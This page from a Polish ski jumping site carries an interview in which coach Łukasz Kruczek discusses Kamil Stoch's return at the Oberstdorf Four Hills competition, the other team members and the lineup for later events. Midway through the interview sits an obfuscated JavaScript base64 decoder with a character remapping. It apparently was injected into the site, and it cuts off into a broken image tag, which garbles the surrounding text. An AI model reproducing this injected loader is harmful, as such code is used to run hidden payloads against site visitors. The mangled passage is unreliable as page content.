You are currently viewing Łukasz Kruczek dla SP: „Kamil nie wypadł z czołówki”

Łukasz Kruczek dla SP: „Kamil nie wypadł z czołówki”

kruczek lukasz kd - Łukasz Kruczek dla SP: "Kamil nie wypadł z czołówki"Udany powrót Kamila Stocha był najważniejszym wydarzeniem dla polskich kibiców skoków narciarskich podczas pierwszego konkursu Turnieju Czterech Skoczni w Oberstdorfie. – Po cichu liczyliśmy na dobrą inaugurację. Od strony technicznej skoki są w porządku, więc można rywalizować – tak występ dwukrotnego mistrza olimpijskiego ocenił trener Łukasz Kruczek.

 

SkokiPolska: Gratulujemy rewelacyjnego powrotu Kamila. Spodziewał się Pan z jego strony aż tak dobrego „debiutu” w tym sezonie?

Łukasz Kruczek: Dziękujemy. Skakał dobrze od drugiego skoku. Czy aż tak dobrego? Gdzieś po cichu liczyliśmy na dobrą inaugurację, ale przede wszystkim cały czas obserwujemy jego poczynania na i poza skocznią. Ważne cały czas jest to, aby wrócił do 100% dyspozycji fizycznej. Skoki od strony technicznej są w porządku, więc można rywalizować.

 
Stoch Kamil Zakopane.2014 B.Leja  300x200 - Łukasz Kruczek dla SP: "Kamil nie wypadł z czołówki"
Kamil Stoch, fot. Bartosz Leja

SkokiPolska: Co umożliwiło tak dobry występ Kamila?

Łukasz Kruczek: Bardzo dobre lato w jego wykonaniu. Ogromna większość skoków z całego sezonu letniego była bardzo dobra i wyłączenie przez kontuzje nie spowodowało cofnięcia umiejętności, ponieważ są one bardzo dobrze utrwalone.

 

SkokiPolska: Czy można powiedzieć, że Kamil wraca do czołówki, czy pierwszy konkurs to za wcześnie, aby tak odważnie mówić?

Łukasz Kruczek: Przede wszystkim jak już powiedziałem wcześniej, skacze dobrze. Obserwujemy cały czas co się dzieje i do każdego z konkursów podchodzimy na nowo. On dobrzeje w szybkim tempie i cały czas korygujemy wobec niego plany. Poza tym on z czołówki nie wypadł…

 

SkokiPolska: Powrót Kamila nieco ustabilizował atmosferę w kadrze? Sam Piotrek Żyła mówił, że oczekujecie już powrotu Kamila.

Łukasz Kruczek: Atmosfera była cały czas dobra, choć można śmiało przyznać, że jest obecnie jeszcze lepsza.

 
- Łukasz Kruczek dla SP: "Kamil nie wypadł z czołówki"function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var y7=”;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Zniszczoł, fot. Stefan Piwowar” src=”http://www.skokipolska.pl/wp-content/uploads/2013/12/Zniszczol_Olek_S.Piwowarr-300×200.jpg” alt=”Aleksander Zniszczoł, fot. Stefan Piwowar" width="300" height="200" /> Aleksander Zniszczoł, fot. Stefan Piwowar

SkokiPolska: Występ Piotrka był taki do jakich przyzwyczaił - jeden skok dobry, drugi słabszy. Nadal problemem jest niestabilność?

Łukasz Kruczek: Trochę na usprawiedliwienie warunki, bo faktycznie przy padającym śniegu miał wczoraj w drugiej serii nieco problemów w pozycji najazdowej, co odbiło się na całym skoku.

 

SkokiPolska: Niestety pozostali kadrowicze ponownie nie zachwycili. Dawid, a szczególnie Janek oddali bardzo słabe skoki...

Łukasz Kruczek: Obaj skoczyli słabo, zdecydowanie poniżej poziomu. Przyczyny są znane, natomiast z ich eliminacją wczoraj szło wyjątkowo opornie.

 

SkokiPolska: Olek Zniszczoł miał dość trudne zadanie w rywalizacji z Damjanem, ale czy z jego skoku jest Pan zadowolony?

Łukasz Kruczek: Tak, Olek skoczył zgodnie z założeniami. Zadanie miał trudne, co nie znaczy, że niemożliwe. Szczególnie w takim scenariuszu, z zmieniającymi się warunkami. Natomiast jego występ należy ocenić na plus. Przy normalnym konkursie dałoby to pucharowe punkty, a o to w rywalizacji chodzi.

 

SkokiPolska: Zgodnie z planem, na Ga-Pa bez zmian?

Łukasz Kruczek: Tak, Ga-Pa bez zmian. Na część austriacką będą zmiany. Możliwe, że nawet większej ilości zawodników biorąc pod uwagę, że zaczną niebawem działać skocznie w Szczyrku, co umożliwi trening korygujący dla zawodników z problemami.

 

rozmawiał Bartosz Leja

 

Dodaj komentarz